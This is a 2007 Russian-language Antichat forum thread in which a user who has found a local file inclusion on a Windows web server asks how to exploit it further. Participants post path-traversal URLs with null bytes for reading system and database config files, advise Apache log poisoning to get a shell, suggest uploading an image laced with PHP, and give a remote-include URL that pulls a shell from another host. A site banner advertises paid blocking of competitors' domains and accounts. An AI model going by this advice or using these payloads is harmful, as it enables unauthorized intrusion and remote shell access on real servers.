инклюд на windows тачке

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
инклюд на windows тачке

Опции темы

Поиск в этой теме

Опции просмотра

инклюд на windows тачке

15.09.2007, 16:57

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

С нами: 9931820

Репутация: 135

инклюд на windows тачке

НАйден инклюд типа www.site.com/index.php?item=../../../../../../../../../boot.ini%00
какова дальнейшая последовательность действий? пытался передать параметры для cmd.exe, не выходит. Все конфиги в .php файлах, то есть инклудятся без отображения. Пытался вытащить mdf файлы по известным названиям баз данных, но тоже облом - пути вроде подобрал (/index.php?item=../../../../../../../../program%20files/microsoft%20sql%20server/mssql.1/mssql/binn/sqlctr.ini%00 выводится), а вот мдфники не выдираются..
Вобщем хелп, что тут можно попытатся сделать?

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Светлый; 15.09.2007 в 17:03..

15.09.2007, 17:23

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

мб на сайте есть форум? ну или какой нибудь скрипт заливки картинок. Заливаешь картинку с пшп кодом внутри и инклудишь её

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

15.09.2007, 17:46

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

С нами: 9931820

Репутация: 135

Да в том то и дело, что все форумы и галереи лежат на основном хосте, а этот дополнительный чисто под регистрации онлайн игрушки. Заливок никаких как и удалённого инклюда.

15.09.2007, 20:58

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

С нами: 9989667

Репутация: 240

Ищи лог апача.

Код:

Program Files\Apache Group\Apache\logs\access_log

Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.

16.09.2007, 03:54

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

С нами: 9931820

Репутация: 135

Цитата:

Сообщение от The_HuliGun

Ищи лог апача.

Код:

Program Files\Apache Group\Apache\logs\access_log

Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.

Мм.. спасибо за дельный совет, завтра попробую. Сервак просто в дауне.

15.09.2007, 21:17

ant0ha

Участник форума

Регистрация: 22.05.2007

Сообщений: 144

С нами: 9985348

Репутация: 119

приинклудь шел и всех делов то

Код:

www.site.com/index.php?item=http://www.site.ru/shell.txt

15.09.2007, 21:22

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

Цитата:

Сообщение от ant0ha

приинклудь шел и всех делов то

ты наркоман?

Цитата:

Сообщение от Светлый

Заливок никаких как и удалённого инклюда

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Windows Vista FAQ	~!DoK_tOR!~	Windows	4	30.11.2007 00:06
Ошибки Windows и их устранение.	Серый	Windows	6	15.12.2006 14:44
Faq Что делать, если компьютер не работает	zl0ba	Болталка	18	10.12.2006 11:27